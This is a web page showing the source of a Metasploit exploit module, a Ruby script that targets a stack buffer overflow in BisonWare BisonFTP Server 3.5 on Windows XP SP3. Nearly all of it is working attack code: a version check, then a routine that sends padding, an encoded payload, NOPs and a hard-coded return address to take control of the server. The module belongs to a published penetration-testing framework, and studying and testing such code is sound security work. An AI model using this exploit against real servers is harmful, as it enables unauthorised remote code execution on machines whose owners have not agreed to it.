Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/bison_ftp_bof.rb
19534 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::Ftp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'BisonWare BisonFTP Server Buffer Overflow',

16
        'Description' => %q{

17
          BisonWare BisonFTP Server 3.5 is prone to an overflow condition.

18
          This module exploits a buffer overflow vulnerability in the said

19
          application.

20
        },

21
        'Platform' => 'win',

22
        'Author' => [

23
          'localh0t', # initial discovery

24
          'veerendragg @ SecPod', # initial msf

25
          'Jay Turla' # msf

26
        ],

27
        'License' => MSF_LICENSE,

28
        'References' => [

29
          [ 'CVE', '1999-1510'],

30
          [ 'BID', '49109'],

31
          [ 'EDB', '17649'],

32
          [ 'URL', 'http://secpod.org/msf/bison_server_bof.rb']

33
        ],

34
        'Privileged' => false,

35
        'DefaultOptions' => {

36
          'VERBOSE' => true

37
        },

38
        'Payload' => {

39
          'Space' => 310,

40
          'BadChars' => "\x00\x0a\x0d",

41
          'StackAdjustment' => -3500,

42
        },

43
        'Targets' => [

44
          [

45
            'Bisonware FTP Server / Windows XP SP3 EN',

46
            {

47
              'Ret' => 0x0040333f,

48
              'Offset' => 1028,

49
              'Nops' => 404

50
            }

51
          ],

52
        ],

53
        'DefaultTarget' => 0,

54
        'DisclosureDate' => '2011-08-07',

55
        'Notes' => {

56
          'Reliability' => UNKNOWN_RELIABILITY,

57
          'Stability' => UNKNOWN_STABILITY,

58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

59
        }

60
      )

61
    )

62
  end

63


64
  def check

65
    connect_login

66
    disconnect

67
    if /BisonWare BisonFTP server product V3\.5/i === banner

68
      return Exploit::CheckCode::Appears

69
    else

70
      return Exploit::CheckCode::Safe

71
    end

72
  end

73


74
  def exploit

75
    connect

76
    print_status('Triggering the prompt for an unregistered product')

77
    sock.put('')

78
    print_status('Disconnecting...')

79
    disconnect

80


81
    print_status('Connecting for the second time to deliver our payload...')

82
    connect # connect for the second time

83


84
    buf = rand_text_alpha(target['Offset'])

85
    buf << payload.encoded

86
    buf << make_nops((target['Nops']) - payload.encoded.length)

87
    buf << [target.ret].pack('V')

88
    print_status('Sending payload...')

89


90
    sock.put(buf)

91
    handler

92
    disconnect

93
  end

94
end

95


96